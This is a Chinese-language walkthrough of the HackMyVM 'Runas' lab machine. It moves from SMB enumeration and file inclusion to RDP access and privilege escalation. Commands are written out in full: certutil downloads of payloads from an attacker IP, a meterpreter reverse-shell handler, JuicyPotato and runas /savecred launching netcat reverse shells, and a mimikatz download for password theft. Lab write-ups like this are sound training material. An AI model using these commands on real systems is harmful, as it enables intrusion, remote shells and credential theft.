8.1 信息打点
首先进行全端口扫描
![图片[1]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251021215820552.png?imageSlim)
端口详细信息
![图片[2]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251021215957125.png?imageSlim)
探测时使用guest账户即可获取信息,说明 SMB 可能允许匿名访问或 guest 权限过高。
![图片[3]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251021220508707.png?imageSlim)
可以使用smbclient进行匿名登录试试,登录成功!但是没有任何东西
![图片[4]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251021220309195.png?imageSlim)
ms17-010
![图片[5]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251021220829211.png?imageSlim)
使用目录扫描、nothing
![图片[6]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251021220939888.png?imageSlim)
8.2 文件包含利用
来到首页点进来index.php发现需要我们传一个file参数,大概率就是文件包含了
![图片[7]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251021221021040.png?imageSlim)
尝试包含index.php没有效果
![图片[8]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251021221103537.png?imageSlim)
利用burp进行批量文件包含,字典网上随便找几个
![图片[9]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251021221300266.png?imageSlim)
筛选内容
![图片[10]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251021223404412.png?imageSlim)
可以看到这里有一段密文
![图片[11]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251021223341154.png?imageSlim)
runas-b3a805b2594befb6c846d718d1224557
yakuzza
解密网站
![图片[12]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022141219258.png?imageSlim)
8.3 远程连接
有了账号密码,登录口在哪?看了看之前的端口扫描结果是没有3389端口的,但是现在又有了。。。。。(中途换了换网,ip变成了10.10.10.168)
![图片[13]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022141944605.png?imageSlim)
可能是我疏忽了吧,快点来连,搞不好等一下又关了
![图片[14]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022142159003.png?imageSlim)
8.4 创建反向shell
![图片[15]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022143619340.png?imageSlim)
windows下载马
certutil.exe -urlcache -split -f http://10.10.10.137:8000/shell.exemsf注意监听,同时执行windows机器上的马
msfconsole
use multi/handler
set lhost 10.10.10.137
set payload windows/meterpreter/reverse_tcp
run![图片[16]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022143604841.png?imageSlim)
8.5 MSF内核提权
![图片[17]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022143635482.png?imageSlim)
全部失败。。。
8.6 WinPEAS提权
在windows中下载下来,并执行,发现一个最新的漏洞补丁没有打
certutil.exe -urlcache -split -f http://10.10.10.137:8000/winPEAS.bat
./winPEAS.bat![图片[18]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022164337275.png?imageSlim)
使用searchsploit检索exp
![图片[19]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022164249248.png?imageSlim)
在windwos中的VS打开,打包成exe
![图片[20]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022160444775.png?imageSlim)
放上去执行的时候没有任何回显,失败了
![图片[21]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022165125354.png?imageSlim)
8.7 土豆提权
后面又试过好几种方法,土豆提权,提权失败
certutil.exe -urlcache -split -f http://10.10.10.137:8000/GodPotato-NET2.exe
certutil.exe -urlcache -split -f http://10.10.10.137:8000/GodPotato-NET35.exe
certutil.exe -urlcache -split -f http://10.10.10.137:8000/GodPotato-NET4.exe
GodPotato-NET2.exe -cmd "cmd /c whoami"
GodPotato-NET35.exe -cmd "cmd /c whoami"
GodPotato-NET4.exe -cmd "cmd /c whoami"![图片[22]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022165544449.png?imageSlim)
8.8 JuicyPotato提权
烂土豆提权
certutil.exe -urlcache -split -f http://10.10.10.137:8000/JuicyPotato.exe
certutil.exe -urlcache -split -f http://10.10.10.137:8000/CLSID/Windows_7_Enterprise/CLSID.list
certutil.exe -urlcache -split -f http://10.10.10.137:8000/juicy-potato/Test/test_clsid.bat![图片[23]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022183620007.png?imageSlim)
JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c C:\Users\runas\nc.exe 10.10.10.137 4444 -e c:\windows\system32\cmd.exe" -t *![图片[24]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022183547586.png?imageSlim)
执行成功了,但是不能执行命令,提权失败
![图片[25]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022183707170.png?imageSlim)
8.9 runas提权
在网上找到了这个,使用runas提权
https://www.cnblogs.com/kqdssheng/p/18751119
![图片[26]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022200022008.png?imageSlim)
在上面这个图片中,可以看到本地管理员账户的凭据已存储在凭据管理器中,并且当前用户是runas!
当前的 runas 用户能列出 RUNAS-PC\Administrator 的缓存凭据,具备利用这些凭据实现本地提权的条件
Domain:interactive=RUNAS-PC\Administrator 是 “交互式登录的管理员凭据缓存”,意味着系统之前保存过 Administrator 的登录信息(比如用户曾用 Administrator 登录,或通过 runas /savecred 保存过凭据)。
虽然无法直接看到明文密码,但 Windows 允许 “在缓存凭据存在时,以该用户身份执行程序”—— 这是提权的关键:
8.10 两种具体提权方法
使用下面的命令启动一个cmd
runas /savecred /user:RUNAS-PC\Administrator "cmd.exe"![图片[27]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022200932949.png?imageSlim)
此时你执行完这条命令目标机器就会弹出一个cmd窗口,此时你执行命令的时候就是administrator超级管理员,那么我们是不是能够通过上面这条命令执行一个木马,或者nc,来反弹这个shell到kali上?
![图片[28]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022201011186.png?imageSlim)
来试试,提权成功!
certutil.exe -urlcache -split -f http://10.10.10.137:8000/nc.exe # 从kali中下载nc
runas /savecred /user:Administrator "C:\Users\runas\nc.exe 10.10.10.169 4444 -e cmd.exe"![图片[29]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022164211514.png?imageSlim)
8.11 msf内核扫描
提升至系统权限可以使用winPACE.exe进行信息收集,在尝试过各种admin提权到系统权限的方式比如
multi/recon/local_exploit_suggester
MS17-017
exploit/windows/local/ms16_075_reflection
烂土豆提权
土豆提权
多土豆汁提权等等MS16-032
![图片[30]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022213926259.png?imageSlim)
最终测试出来windows/local/service_permissions 能够成功提权到system权限, Windows服务权限配置错误漏洞。
![图片[31]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022213650872.png?imageSlim)
8.13 抓取明文密码
上传mimikatz,获取明文密码!!
certutil.exe -urlcache -split -f http://10.10.10.169:8000/mimikatz.exe![图片[32]-HackMyVm-Runas :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251022221440585.png?imageSlim)
往期推荐
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
新版BurpSuite v2025.6.3汉化版,附激活教程
重大更新!FeatherScan v4.5 内网 linux 信息收集,提权一键梭哈神器
FeatherScan v4.0 – 一款Linux内网全自动信息收集工具
近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等
内网渗透必备,microsocks,一个轻量级的socks代理工具
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏
【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!
【oscp】vulnerable_docker,三种代理方法打入内网
【内网渗透】CobaltStrike与MSF联动互相上线的方式
内网渗透必备,microsocks,一个轻量级的socks代理工具
【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!
DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学
不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学
ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略
本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
暂无评论内容